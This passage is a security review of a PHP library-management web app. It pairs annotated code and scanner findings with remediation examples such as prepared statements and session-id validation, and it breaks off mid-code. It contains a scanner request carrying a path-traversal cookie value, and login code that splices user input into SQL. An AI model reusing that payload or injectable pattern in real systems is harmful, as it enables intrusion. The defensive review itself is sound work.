Vulnerability Detection Report
I. Potential vulnerabilities in the system and their analysis
1. Page-number validity check
When the total number of books is fetched to compute the total page count, the requested page number must first be checked for validity; if the record count is 0, start directly from page 1 so that the offset is not miscalculated. Validating the numbers up front makes the code more robust.
    $bookModel = new BookModel;
    $count = $bookModel->rowCount($where);
    if ($count != 0) {
        // Clamp the requested page into [1, lastPage].
        if ($currentPage < 1) {
            $currentPage = 1;
        } else if ($currentPage > ceil($count / $eachPerPage)) {
            $currentPage = ceil($count / $eachPerPage);
        }
    } else {
        // No records at all: page 1 keeps the offset at 0.
        $currentPage = 1;
    }
2. Check that the submitted information is complete
Add a check that the submitted information is complete, to guarantee the integrity and correctness of the data and the security of the account. It can effectively stop a particular registered user from making endless login attempts with a brute-force program, and can prevent bulk registration; it is a strain even for a human eye, let alone a machine.
    // Strict flag on in_array(): without it PHP 7 treats 0 == "" as true, so a
    // legitimate numeric 0 in $bookInfo would be reported as "missing".
    if (in_array("", $bookInfo, true)) {
        $this->sendJsonMessage("请输入完整信息", 1);   // sendJsonMessage() is assumed to end the request
    }
    $bookModel = new BookModel;
    if ($bookModel->insert($bookInfo)) {
        $this->sendJsonMessage("添加成功", 0);
    } else {
        $this->sendJsonMessage("添加失败", 1);
    }
}   // end of the insert() action
3. Compute the due date and check that a renewal is allowed
Compute the date by which the book must be returned and check whether the reader is already past it; an overdue book cannot be renewed.
    // $result is the loan row fetched in item 4; back_date is its current due date.
    if (strtotime($result['back_date']) < time()) {
        $this->sendJsonMessage("超期的书不能续借", 1);
    }
    // A renewal extends the due date by one month from the current due date.
    $backTime = date("Y-m-d", strtotime("+1 month", strtotime($result['back_date'])));
    $data = array("back_date" => $backTime);
    if ($borrowModel->update($data, "book_id={$bookId} AND user_id={$userId}")) {
        $this->sendJsonMessage("续借成功", 0);
    } else {
        $this->sendJsonMessage("续借失败", 1);
    }
}   // end of the renew action
4. Abort when parameters are missing
If the parameters are not supplied, abort the operation.
    if (!isset($_POST['bookId']) || !isset($_POST['userId'])) {
        $this->sendJsonMessage("缺少参数", 1);
    }
    // Both ids are interpolated into SQL below, so force them to integers here;
    // a non-numeric value would otherwise become part of the WHERE clause.
    $bookId = (int) $_POST['bookId'];
    $userId = (int) $_POST['userId'];
    $borrowModel = new BorrowModel;
    $result = $borrowModel->fetchOne("book_id={$bookId} AND user_id={$userId}");
5. No renewal without a loan
First check whether the user has actually borrowed this book; if not, the renewal is refused. Otherwise, provided the loan is not overdue, the renewal may proceed.
    if (empty($result)) {
        $this->sendJsonMessage("该用户没有借阅此书", 1);
    }
6. Validity check for returning a book
Add a check of whether the book can be returned: if the information is wrong or the user has not borrowed this book, the return is refused.
    public function returnBook() {
        $this->accessJson();
        // Integer ids, because they are interpolated into the WHERE clause below.
        $bookId = (int) $_POST['bookId'];
        $userId = (int) $_POST['userId'];
        $borrowModel = new BorrowModel;
        if ($borrowModel->canReturn($bookId, $userId)) {
            if ($borrowModel->delete("book_id={$bookId} AND user_id={$userId}")) {
                $this->sendJsonMessage("还书成功", 0);
            } else {
                $this->sendJsonMessage("还书失败", 1);
            }
        } else {
            $this->sendJsonMessage("信息错误或该用户未借此书", 1);
        }
    }
}   // end of the controller class
7. Fetch the user record, block illegal URL parameters, and report a non-existent user
    // $id comes from the URL; cast it so that only a numeric id reaches the query.
    $userInfo = $userModel->fetchOne("id=" . (int) $id);
    if (empty($userInfo)) {
        echo "<script>alert('该用户不存在');</script>";
        die();
    }
    $borrowModel = new BorrowModel;
8. Add-user endpoint
Add a check of whether the ID already exists, to prevent duplicate IDs.
    public function insert() {
        $this->accessJson();
        $user['id'] = $_POST['userId'];
        $user['pwd'] = md5($_POST['password']);   // unsalted MD5 as in the original; password_hash() is the stronger choice
        $user['name'] = $_POST['name'];
        $user['class'] = $_POST['class'];
        $user['status'] = !empty($_POST['status']) ? 1 : 0;
        $usermodel = new UserModel;
        // Strict comparison: with the default loose in_array(), PHP 7 treats the
        // integer status 0 as equal to "" and every such user would be rejected as incomplete.
        if (in_array("", $user, true)) {
            $this->sendJsonMessage("请将信息填写完整", 1);
        }
        // The id is interpolated into SQL, so only its integer value is used.
        if ($usermodel->rowCount("id=" . (int) $user['id'])) {
            $this->sendJsonMessage("该用户ID已存在", 1);
        }
        if ($usermodel->insert($user)) {
            $this->sendJsonMessage("添加用户成功", 0);
        } else {
            $this->sendJsonMessage("添加用户失败", 1);
        }
    }
9. Delete operation
Before deleting, ask the user once more to confirm, to prevent accidental deletion.
    $(".delete").click(function () {
        if (confirm("真的要删除吗?")) {
            // settings-object form of $.post (jQuery 1.12 / 2.2 or later)
            $.post({
                url: "?p=Admin&c=Book&a=delete",
                data: {"id": $(this).attr("bookId")},
                success: function (data) {
                    alert(data.message);
                    location.reload();
                }
            });
        }
    });
});   // end of the $(function () { ... }) ready handler
10. Verifying page permissions
Use if statements to decide whether access to the page is legitimate, improving code robustness and the security of system permissions.
    protected function accessPage() {
        if (isset($_SESSION['userId'])) {
            // P is a constant holding the current module name ("Admin" or "Home").
            // An administrator may only open Admin pages, an ordinary user only Home pages.
            $allowed = ($_SESSION['admin'] == 1 && P == "Admin")
                    || ($_SESSION['admin'] == 0 && P == "Home");
            if (!$allowed) {
                // Wrong area for this role: send the user to their own home page.
                $p = $_SESSION['admin'] ? "Admin" : "Home";
                header("location:?p={$p}&c=Index&a=index");
                die();
            }
        } else {
            header("location:?p=Common&c=Login&a=index");
            die();
        }
    }
11. Verifying endpoint permissions
Use if statements to decide whether the caller is allowed to perform the operation, improving code robustness and the security of system permissions.
    protected function accessJson() {
        header("Content-Type:application/json");
        if (isset($_SESSION['userId'])) {
            // Same role/module rule as accessPage(); P is the current module name.
            $allowed = ($_SESSION['admin'] == 1 && P == "Admin")
                    || ($_SESSION['admin'] == 0 && P == "Home");
            if (!$allowed) {
                $this->sendJsonMessage("操作权限不足", 1);
            }
        } else {
            $this->sendJsonMessage("未登陆", 1);
        }
    }
12. Check whether the user is logged in and, if so, redirect to the matching home page
Before rendering the page, check whether the user is already logged in; if so, redirect to the corresponding home page. Otherwise prompt the user to log in and go to the login screen.
    private function checkLogin() {
        if (isset($_SESSION['userId'])) {
            $p = $_SESSION['admin'] ? "Admin" : "Home";
            header("location:?p={$p}&c=Index&a=index");
            die();
        }
    }
    public function index() {
        $this->checkLogin();
        $this->smarty->display("login.html");
    }
    public function showVerify() {
        new Verify;   // renders the captcha image
    }
13. Verify the captcha first, and only once it passes check the account and password, to reduce database load
    // $userId and $password come from the POST body; $password is expected to be
    // the md5 of the posted password, matching how insert() stores it.
    $userModel = new UserModel;
    // Note: $userId is a user-supplied string interpolated into the WHERE clause,
    // the same pattern the scanner reports as SQL injection in Part II.
    $where = "id='{$userId}' and pwd='{$password}'";
    $result = $userModel->fetchOne($where);
    if (!empty($result) && $result['status'] == 1) {
        $_SESSION['userId'] = $userId;
        $_SESSION['admin'] = $result['admin'];
        $_SESSION['last_login_time'] = $result['last_login_time'];
        $message = array("message" => "OK", "code" => 0, "admin" => "{$result['admin']}");
14. Update the last login time
Before updating the time, check whether the account has been reported lost; if it has, tell the user to contact an administrator.
        $time = date('Y-m-d H:i:s');
        $userModel->update(array("last_login_time" => $time), $where);
    } else if (!empty($result) && $result['status'] == 0) {
        $message = array("message" => "该账户已挂失,请联系管理员解决", "code" => 1);
    } else {
        $message = array("message" => "账号或密码错误", "code" => 1);
    }
15. Login
At login the captcha is checked first, and the first step of checking the captcha is to check that it has the right number of characters.
    $("#submit").click(function () {
        if ($("[name='userId']").val().length == 0 || $("[name='password']").val().length == 0) {
            alert("请输入账号或密码!");
            return false;
        } else if ($("[name='verify']").val().length != 4) {
            alert("验证码必须为4位!");
            return false;
        }
        $.post({
            url: "?p=Common&c=Login&a=login",
            data: $("#form").serialize(),
            success: function (data) {
                if (data.code == 0 && data.admin == 1) {
                    // administrator login
                    location.href = "?p=Admin&c=Index&a=index";
                } else if (data.code == 0 && data.admin == 0) {
                    // ordinary user login
                    location.href = "?p=Home&c=Index&a=index";
                } else {
                    alert(data.message);
                    $("#verifyPic").click();   // fetch a new captcha image
                    $("[name='verify']").val("");
                }
            }
        });
    });
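The server side of the login flow in items 12 to 15, together with the password guidance of item 28, as an added example that is not the project's own code. It keeps the page's ordering (captcha before any database access), binds the account id instead of interpolating it into the WHERE clause, checks the stored hash with password_verify() while still accepting and upgrading the unsalted MD5 values this application stores, and regenerates the session id on success. Assumed and not on the page: the Verify class keeps the expected captcha text in $_SESSION['verify'], the table is named users with columns id, pwd, status, admin and last_login_time, and $mysqli is the application's open \mysqli connection (mysqlnd driver).

```php
<?php
// Added example, not the project's code. Assumptions: the captcha text is in
// $_SESSION['verify'] (set by the Verify class), the table is `users` with
// columns id, pwd, status, admin, last_login_time, and $mysqli is an open
// \mysqli connection (mysqlnd, for get_result()). session_start() has run.

function checkCaptcha(string $input): bool
{
    // Cheap checks first, so a wrong captcha never costs a database round-trip.
    if (strlen($input) !== 4 || empty($_SESSION['verify'])) {
        return false;
    }
    $expected = (string) $_SESSION['verify'];
    unset($_SESSION['verify']);   // each captcha image is valid for one attempt
    return hash_equals(strtolower($expected), strtolower($input));
}

function login(\mysqli $mysqli, string $userId, string $password, string $captcha): array
{
    if (!checkCaptcha($captcha)) {
        return ["message" => "验证码错误", "code" => 1];
    }

    // The account id is bound as a parameter, not spliced into the SQL text,
    // so whatever the client sends is compared as a literal value.
    $stmt = $mysqli->prepare(
        "SELECT id, pwd, status, admin, last_login_time FROM users WHERE id = ?"
    );
    $stmt->bind_param("s", $userId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // One generic message for "no such account" and "wrong password", so the
    // endpoint does not reveal which ids exist.
    $fail = ["message" => "账号或密码错误", "code" => 1];
    if ($row === null) {
        return $fail;
    }

    // Prefer a password_hash() value; fall back to the legacy 32-character MD5
    // hex string this application stores, and upgrade it after a successful login.
    $stored = (string) $row['pwd'];
    $ok = password_verify($password, $stored);
    $legacy = !$ok && strlen($stored) === 32 && hash_equals($stored, md5($password));
    if (!$ok && !$legacy) {
        return $fail;
    }
    if ((int) $row['status'] !== 1) {
        return ["message" => "该账户已挂失,请联系管理员解决", "code" => 1];
    }

    $newHash = $legacy ? password_hash($password, PASSWORD_DEFAULT) : $stored;
    $now = date('Y-m-d H:i:s');
    $upd = $mysqli->prepare("UPDATE users SET pwd = ?, last_login_time = ? WHERE id = ?");
    $upd->bind_param("sss", $newHash, $now, $userId);
    $upd->execute();
    $upd->close();

    // A new session id at the moment privileges change defeats session fixation
    // through a planted PHPSESSID cookie (compare the baseline finding in Part II).
    session_regenerate_id(true);
    $_SESSION['userId'] = $row['id'];
    $_SESSION['admin'] = (int) $row['admin'];
    $_SESSION['last_login_time'] = $row['last_login_time'];

    return ["message" => "OK", "code" => 0, "admin" => (int) $row['admin']];
}

// Controller glue for ?p=Common&c=Login&a=login, producing the JSON shape
// (code, message, admin) that the page's JavaScript expects:
//   header("Content-Type: application/json");
//   echo json_encode(login($mysqli, $_POST['userId'] ?? '', $_POST['password'] ?? '', $_POST['verify'] ?? ''));
```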
16. Report-lost endpoint
After the account is successfully reported lost, destroy the session so that the login is no longer valid.
    public function lost() {
        $this->accessJson();
        $id = (int) $_SESSION['userId'];   // integer, because it is interpolated into the WHERE clause
        $userModel = new UserModel;
        if ($userModel->update(array("status" => 0), "id={$id}")) {
            $_SESSION = array();
            session_destroy();
            $this->sendJsonMessage("挂失成功", 0);
        } else {
            $this->sendJsonMessage("挂失失败", 1);
        }
    }
17. Change-password endpoint
    public function changePwd() {
        $this->accessJson();
        $originPwd = md5($_POST['originPwd']);
        $newPwd = md5($_POST['newPwd']);
        $confirmPwd = md5($_POST['confirmPwd']);
18. When changing the password, require the confirmation entry to match, to prevent invalid submissions
        if ($newPwd != $confirmPwd) {
            $this->sendJsonMessage("两次输入的密码不一致", 1);
        }
        $userModel = new UserModel;
        $uid = (int) $_SESSION['userId'];   // integer, because it is interpolated into the WHERE clause
        // Only the row whose stored hash equals the hash of the old password is touched.
        if ($userModel->rowCount("id={$uid} and pwd='{$originPwd}'")) {
            if ($userModel->update(array("pwd" => $newPwd), "id={$uid} and pwd='{$originPwd}'")) {
19. Destroy the current session after the password has been changed
                $_SESSION = array();
                session_destroy();
                $this->sendJsonMessage("密码修改成功", 0);
            } else {
                $this->sendJsonMessage("密码修改失败", 1);
            }
        } else {
            $this->sendJsonMessage("原密码错误", 1);
        }
    }
}   // end of the controller class
20. When changing the password, warn if the two entries differ
    $("#pwdSubmit").click(function () {
        if ($("[name='originPwd']").val().length == 0 || $("[name='newPwd']").val().length == 0 || $("[name='confirmPwd']").val().length == 0) {
            alert("请将信息填写完整");
            return false;
        }
        if ($("[name='newPwd']").val() != $("[name='confirmPwd']").val()) {
            alert("两次输入的密码不一致");
            return false;
        }
        $.post({
            url: "?p=Home&c=User&a=changePwd",
            data: $("#form").serialize(),
            success: function (data) {
                alert(data.message);
                if (data.code == 0) {
                    location.reload();
                }
            }
        });
    });
21. Prevent cloning
    private function __clone() {}
22. Prevent instantiation with new
    private function __construct() {
        $this->db_host = $GLOBALS['conf']['db_host'];
        $this->db_user = $GLOBALS['conf']['db_user'];
        $this->db_pwd = $GLOBALS['conf']['db_pwd'];
        $this->db_name = $GLOBALS['conf']['db_name'];
        $this->db_port = $GLOBALS['conf']['db_port'];
        $this->charset = $GLOBALS['conf']['charset'];
        $this->connect();
        $this->setCharSet();
    }
    private function connect() {
        // @ silences the constructor's own warning; the connect_errno check below reports the failure instead.
        @$this->mysqli = new \mysqli($this->db_host, $this->db_user, $this->db_pwd, $this->db_name, $this->db_port);
        if ($this->mysqli->connect_errno != 0) {
            echo "<h2>MySql连接错误!</h2>";
            echo "错误信息:" . $this->mysqli->connect_error;   // exposes driver details to the client; log it instead in production
            die();
        }
    }
    private function setCharSet() {
        $this->mysqli->set_charset($this->charset);
    }
23. Check whether the SQL statement failed
    private function isErr() {
        if ($this->mysqli->errno != 0) {
            echo "<h2>Sql语句错误</h2>";
            echo "错误信息:" . $this->mysqli->error;   // raw driver error shown to the client; prefer logging it
            die();
        }
    }
24. The "previous page" control
On the first page the "previous" link is disabled; on other pages it behaves normally.
    private function firstInit() {
        if ($this->currentPage == 1) {
            $disable = "class='disabled'";
            $tag = "span";   // a <span> cannot be followed, so there is no link back from page 1
            $link = "";
        } else {
            $disable = "";
            $tag = "a";
            $link = "href='{$this->pre}'";
        }
        $this->pageStr = "<nav class='text-center'>
            <ul class='pagination'>
                <li {$disable}>
                    <{$tag} {$link} aria-label='Previous'>
                        <span aria-hidden='true'>«</span>
                    </{$tag}>
                </li>";
    }
25. Middle page numbers: when there are fewer than 5 pages the list starts at 1; otherwise there is the normal case, the left-overflow case and the right-overflow case
    private function middleInit() {
        if ($this->pageNum <= 5) {
            // Few enough pages to list them all.
            $start = 1;
            $end = $this->pageNum;
        } else if ($this->currentPage - 2 < 1) {
            // Left overflow: the window would start before page 1.
            $start = 1;
            $end = 5;
        } else if ($this->currentPage + 2 > $this->pageNum) {
            // Right overflow: the window would run past the last page.
            $start = $this->pageNum - 4;
            $end = $this->pageNum;
        } else {
            // Normal case: two pages on either side of the current one.
            $start = $this->currentPage - 2;
            $end = $this->currentPage + 2;
        }
        // The loop that emits the <li> entries for $start..$end is not shown on this page.
    }
26. The "next page" control
On the last page the "next" link is disabled; on other pages it behaves normally.
    private function lastInit() {
        if ($this->currentPage == $this->pageNum) {
            $disable = "class='disabled'";
            $tag = "span";
            $link = "";
        } else {
            $disable = "";
            $tag = "a";
            $link = "href='{$this->next}'";
        }
        $this->pageStr .= "<li {$disable}>
            <{$tag} {$link} aria-label='Next'>
                <span aria-hidden='true'>»</span>
            </{$tag}>
        </li>
    </ul>
</nav>";
    }
}   // end of the pagination class
27. Allocating a colour for the captcha text
    // Each RGB component is a random value between 50 and 150.
    $color = imagecolorallocate($this->picRes, rand(50, 150), rand(50, 150), rand(50, 150));
28. Authentication vulnerabilities: if the system's authentication mechanism is not secure enough, an attacker may bypass it through weak passwords, session hijacking or cross-site scripting, enter the system and perform malicious operations.
Measure 1: Enforce a strong password policy: require users to choose complex passwords and to change them periodically. Store and transmit passwords using cryptographic algorithms.
29. Database injection vulnerabilities: if the system does not adequately validate and filter user input, an attacker may submit specially constructed input that executes malicious database queries, disclosing sensitive information or modifying the database contents.
Measure 1: Validate and filter user input strictly: make sure that submitted data matches the expected format and content, for example with an input-validation library or regular expressions.
Measure 2: Use parameterized queries or an ORM framework: parameterized queries or an object-relational mapping (ORM) framework effectively prevent database injection.
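Measure 2 applied to the model layer of this application, as an added example that is not the project's own code. The models on this page take a ready-made `$where` string (rowCount($where), fetchOne($where), update($data, $where), delete($where)), which is the shape behind every SQL injection finding in Part II: the Book search `keyword`, the Book insert fields and the edit `id`. The repository below binds every value and whitelists every column name. Assumed and not on the page: a `book` table with the columns the add form posts (ISBN, name, author, press, pressTime, price, desc) plus an integer id, and an open \mysqli connection.

```php
<?php
// Added example, not the project's code. Assumes a `book` table with the
// columns the add form posts (ISBN, name, author, press, pressTime, price,
// desc) plus an integer primary key id, and an open \mysqli connection.

class BookRepository
{
    // Column whitelist: the request supplies values, never identifiers.
    // `desc` is a reserved word, hence the backticks when it is emitted.
    const COLUMNS = ['ISBN', 'name', 'author', 'press', 'pressTime', 'price', 'desc'];

    private $db;   // \mysqli

    public function __construct(\mysqli $db)
    {
        $this->db = $db;
    }

    // Prepare, bind and execute. Bind types follow the PHP values, so
    // LIMIT/OFFSET are sent as integers (the server rejects strings there).
    private function run(string $sql, array $params): \mysqli_stmt
    {
        $stmt = $this->db->prepare($sql);
        if ($stmt === false) {
            throw new \RuntimeException("prepare failed: " . $this->db->error);
        }
        if ($params) {
            $types = '';
            foreach ($params as $p) {
                $types .= is_int($p) ? 'i' : (is_float($p) ? 'd' : 's');
            }
            $stmt->bind_param($types, ...$params);
        }
        if (!$stmt->execute()) {
            throw new \RuntimeException("execute failed: " . $stmt->error);
        }
        return $stmt;
    }

    // Replaces fetchOne("id={$id}") behind ?c=Book&a=edit&id=...
    public function findById($id): ?array
    {
        $stmt = $this->run("SELECT * FROM book WHERE id = ?", [(int) $id]);
        $row = $stmt->get_result()->fetch_assoc();
        $stmt->close();
        return $row ?: null;
    }

    // Replaces the keyword search behind ?c=Book&a=index&keyword=...: the
    // keyword is a bound LIKE pattern with its own wildcards escaped, the
    // page is clamped as in item 1, and LIMIT/OFFSET are bound integers.
    public function search(string $keyword, int $page, int $perPage): array
    {
        $perPage = max(1, $perPage);
        $pattern = '%' . addcslashes($keyword, '%_\\') . '%';
        $cnt = $this->run(
            "SELECT COUNT(*) AS n FROM book WHERE name LIKE ? OR author LIKE ?",
            [$pattern, $pattern]
        );
        $total = (int) $cnt->get_result()->fetch_assoc()['n'];
        $cnt->close();
        $pages  = max(1, (int) ceil($total / $perPage));
        $page   = min(max(1, $page), $pages);
        $offset = ($page - 1) * $perPage;
        $stmt = $this->run(
            "SELECT * FROM book WHERE name LIKE ? OR author LIKE ? ORDER BY id LIMIT ? OFFSET ?",
            [$pattern, $pattern, $perPage, $offset]
        );
        $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
        $stmt->close();
        return ['total' => $total, 'page' => $page, 'rows' => $rows];
    }

    // Replaces insert($bookInfo) behind ?c=Book&a=insert: column names come
    // from the whitelist, every value is bound, unknown keys are refused.
    public function insert(array $data): int
    {
        $extra = array_diff(array_keys($data), self::COLUMNS);
        if ($extra) {
            throw new \InvalidArgumentException("unexpected field: " . implode(', ', $extra));
        }
        $vals = [];
        foreach (self::COLUMNS as $col) {
            if (!isset($data[$col]) || $data[$col] === '') {
                throw new \InvalidArgumentException("missing field: $col");
            }
            $vals[] = (string) $data[$col];
        }
        $cols  = '`' . implode('`, `', self::COLUMNS) . '`';
        $marks = implode(', ', array_fill(0, count(self::COLUMNS), '?'));
        $stmt = $this->run("INSERT INTO book ($cols) VALUES ($marks)", $vals);
        $stmt->close();
        return (int) $this->db->insert_id;
    }
}

// Controller use, e.g. in the Book index action:
//   $repo = new BookRepository($mysqli);
//   $result = $repo->search($_GET['keyword'] ?? '', (int) ($_GET['page'] ?? 1), 10);
```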
30. Cross-site scripting vulnerabilities: if the system does not properly escape and filter user input, an attacker may inject malicious script into a web page and steal users' sensitive information or carry out other malicious actions.
Measure 1: Input validation and filtering: validate and filter user input strictly so that only the expected data format and content are accepted, for example with an input-validation library or regular expressions.
Measure 2: Output escaping: when user-supplied data is written into a web page, escape special characters appropriately so that injected script cannot execute; use a safe output function or an HTML-encoding library.
Measure 3: Secure coding practice: never trust user input and never build dynamic HTML by direct string concatenation, to reduce the risk of XSS.
Measure 4: Continuous updating and patching: keep the system and application frameworks up to date so that the latest security patches and fixes for known XSS flaws are applied.
Measure 5: Security training and awareness: train developers so that they recognise XSS and other security problems and apply the appropriate countermeasures.
31. Insecure file upload: if the system lets users upload files without properly validating and restricting them, an attacker may upload a malicious file and execute arbitrary code or gain system privileges.
Measure 1: Implement file upload securely: restrict the type and size of uploaded files and validate and inspect them strictly on the server side. Preferably store uploaded files in a directory that is not reachable over the web.
32. Update the system and frameworks regularly: apply security patches promptly and keep the system and frameworks up to date so that the system is not exposed to known vulnerabilities.
II. Vulnerabilities detected in the system with X-RAY and their remediation
1. File inclusion vulnerability
URL: http://library/readme.md
Payload: /readme.md
Request1:
GET /readme.md HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/79.0
Content-Length: 67
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-7
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
2. File inclusion vulnerability
URL: http://library/README.md
Payload: /README.md
Request1:
GET /README.md HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
3. File inclusion vulnerability
URL: http://library/LICENSE
Payload: /LICENSE
Request1:
GET /LICENSE HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
4. File inclusion vulnerability
URL: http://library/server-status
Payload: /server-status
Request1:
GET /server-status HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
password=123456&userId=123456789&verify=pv5D
How file inclusion vulnerabilities arise:
When the server executes a PHP file, it can use a file-inclusion function to load and execute the PHP code of another file, which saves time and avoids writing the same code again; this way of pulling in a file is called inclusion. If, however, the developers do not strictly vet where the included file comes from, a malicious file may be included and unintended code executed, which is a file inclusion vulnerability.
The four PHP functions that can give rise to file inclusion vulnerabilities are:
(1) require()
(2) require_once()
(3) include()
(4) include_once()
require(): if an error occurs during inclusion, for example the file does not exist, execution stops immediately and the following statements are not run.
include(): on error it only emits a warning and continues with the following statements.
require_once() and include_once() differ from the first two in that they include a file only once: if a file has already been included it is not included again, which avoids problems such as function redefinition or variable reassignment.
Remediation for file inclusion vulnerabilities:
1. Use a whitelist.
2. Restrict access to a fixed path and append the parameter to that path.
3. In PHP, use the open_basedir setting to confine file access to a specified area.
4. Filter special characters such as . (dot), / (slash) and \ (backslash).
5. Disable the allow_url_include setting wherever possible.
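The remediation list above, applied to this application's own ?p=<module>&c=<controller>&a=<action> routing, as an added example that is not the project's code: the module comes from a fixed whitelist (measure 1), the controller name is reduced to letters and digits and appended to a fixed path (measures 2 and 4), the resolved file is confirmed to lie under the application root (the guarantee open_basedir gives, measure 3), and a start-up check refuses to run with allow_url_include enabled (measure 5). The directory layout APP_ROOT/<module>/<Controller>.class.php is a hypothetical assumption; only the module names Admin, Home and Common are taken from the URLs on this page.

```php
<?php
// Added example, not the project's code: whitelist-based resolution of the
// p/c request parameters (?p=Admin&c=Book&a=index) to a file that is safe to
// include. File layout is assumed (hypothetical): APP_ROOT/<p>/<c>.class.php.

const APP_ROOT = __DIR__;                       // application root (assumed)
const MODULES  = ['Admin', 'Home', 'Common'];   // measure 1: the only modules this application has
const CONTROLLER_NAME_RE = '/\A[A-Za-z][A-Za-z0-9]{0,31}\z/';

function resolveControllerFile(string $module, string $controller): string
{
    // Measure 1: the module must be one of a fixed list.
    if (!in_array($module, MODULES, true)) {
        throw new \InvalidArgumentException("unknown module");
    }
    // Measure 4 as an allow-list rather than a deny-list: letters and digits
    // only, so '.', '/', '\', NUL and stream-wrapper prefixes such as php://
    // or http:// cannot be part of the name at all.
    if (!preg_match(CONTROLLER_NAME_RE, $controller)) {
        throw new \InvalidArgumentException("bad controller name");
    }
    // Measure 2: the parameter is appended to a fixed path, never used as one.
    $file = APP_ROOT . DIRECTORY_SEPARATOR . $module . DIRECTORY_SEPARATOR . $controller . '.class.php';

    // Defence in depth: confirm the resolved file really lies under APP_ROOT,
    // which is what open_basedir enforces at the PHP level (measure 3).
    $real = realpath($file);
    $root = realpath(APP_ROOT);
    if ($real === false || $root === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new \RuntimeException("controller not found");
    }
    return $real;
}

// Measures 3 and 5 as a start-up check: refuse to run under a permissive php.ini.
function assertIncludeHardening(): void
{
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new \RuntimeException("allow_url_include must be Off");
    }
    if ((string) ini_get('open_basedir') === '') {
        trigger_error("open_basedir is not set; include paths are unrestricted", E_USER_WARNING);
    }
}

// The name rule against constructed inputs (no files needed): only "Book" passes.
foreach (['../Base', 'Book.class', 'php://filter', 'Book'] as $name) {
    printf("%-14s %s\n", $name, preg_match(CONTROLLER_NAME_RE, $name) ? 'accepted' : 'rejected');
}

// Front-controller use:
//   assertIncludeHardening();
//   require_once resolveControllerFile($_GET['p'] ?? 'Common', $_GET['c'] ?? 'Login');
```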
5. Baseline check finding
URL: http://library/
Request1:
GET / HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=../../../../public/858425652.php
Origin: http://library
Referer: http://library/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Response1:
HTTP/1.1 200 OK
Content-Type: text/html;charset:UTF-8;charset=UTF-8
Date: Sat, 3 Jun 2023 17:21:56 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
<br />
<b>Warning</b>: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>D:\phpstudy_pro\WWW\Library\Base\Base.class.php</b> on line <b>15</b><br />
<br />
<b>Warning</b>: session_start(): Failed to read session data: files (path: D:\phpstudy_pro\Extensions\tmp\tmp) in <b>D:\phpstudy_pro\WWW\Library\Base\Base.class.php</b> on line <b>15</b><br />
Remediation for the baseline finding: apply patches.
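The root cause behind this finding, as an added example that is not the project's code: Base.class.php passes the PHPSESSID cookie straight to session_start(), so the scanner's traversal value produced the two PHP warnings in the response above and disclosed the absolute install path. The guard below validates the cookie against PHP's own session-id alphabet before session_start(), enables strict mode so that an id the server never issued is not adopted, and keeps warnings out of the response. Apart from session_name(), nothing here depends on the application's configuration.

```php
<?php
// Added example, not the project's code. Drop-in replacement for the bare
// session_start() in Base.class.php (line 15 according to the warning above).

// PHP's own rule for a session id: characters a-z A-Z 0-9 , and - (as the
// warning in the response says); session.sid_length allows 22 to 256 characters.
const SESSION_ID_RE = '/\A[A-Za-z0-9,-]{22,256}\z/';

function isValidSessionId(string $id): bool
{
    return preg_match(SESSION_ID_RE, $id) === 1;
}

function startSessionSafely(): void
{
    // Warnings from session_start() embed the absolute script path (as seen in
    // the response above); log them, never print them into the page.
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');

    // Strict mode: an id the server did not create is discarded and replaced,
    // which also closes session fixation through a planted cookie.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.cookie_httponly', '1');

    $name = session_name();
    if (isset($_COOKIE[$name]) && !isValidSessionId((string) $_COOKIE[$name])) {
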